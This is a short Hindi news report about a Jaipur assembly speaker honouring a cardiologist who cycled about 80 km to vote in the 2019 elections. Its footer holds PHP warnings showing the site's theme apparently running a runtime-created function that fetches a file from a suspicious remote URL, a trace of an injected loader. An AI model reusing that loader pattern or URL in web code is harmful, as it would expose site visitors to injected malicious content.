साइकिल यात्रा कर लोकतंत्र के महापर्व में भाग लेने पर डा. शर्मा सम्मानित

जयपुर 9 मई  2019 विधानसभा अध्यक्ष डॉ. सी. पी. जोशी ने गुरूवार को यहां विधानसभा स्थित अपने वैश्म में हृदय रोग विशेषज्ञ डा. जी.एल. शर्मा द्वारा लोकतंत्र के महापर्व में भाग लेने हेतु जयपुर से 80 किलोमीटर की साइकिल यात्रा कर मताधिकार का इस्तेमाल करने पर उन्हें सम्मानित किया ।
 विधानसभा अध्यक्ष ने डा. शर्मा को साफा, शॉल एवं विधानसभा की डायरी प्रदान कर सम्मानित किया । विधानसभा अध्यक्ष ने डा. शर्मा को साइकिल यात्रा की बधाई देते हुए कहा कि लोकतंत्र को मजबूती प्रदान करने में आमजन की महत्ती भूमिका है ।  हमें व्यक्तिगत कार्यकलापों के साथ साथ राष्ट्रीय लोकतांत्रिक व्यवस्था के सुदृढिकरण में भी अपनी रचनात्मक भूमिका का निर्वहन करना चाहिए ।
उल्लेखनीय है कि डा. शर्मा ने जयपुर से करीब 80 किलोमीटर दूर टोंक जिले में सोडा गांव तक साइकिल से जाकर मतदान किया । यह गांव जयपुर से मालपुरा डिग्गीरोड पर टोंक सवाई माधोपुर लोकसभा क्षेत्र में आता है । डा. शर्मा ने गांव सोडा तक की यह दूरी 4 घंटे में पूरी कर लोकतंत्र के महापर्व में अपना योगदान किया।

Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/patrikajagat/public_html/wp-content/themes/sahifa/footer.php(39) : runtime-created function on line 1

Warning: file_get_contents(http://nativeredir.tk/lx/1.txt): failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/patrikajagat/public_html/wp-content/themes/sahifa/footer.php(39) : runtime-created function on line 1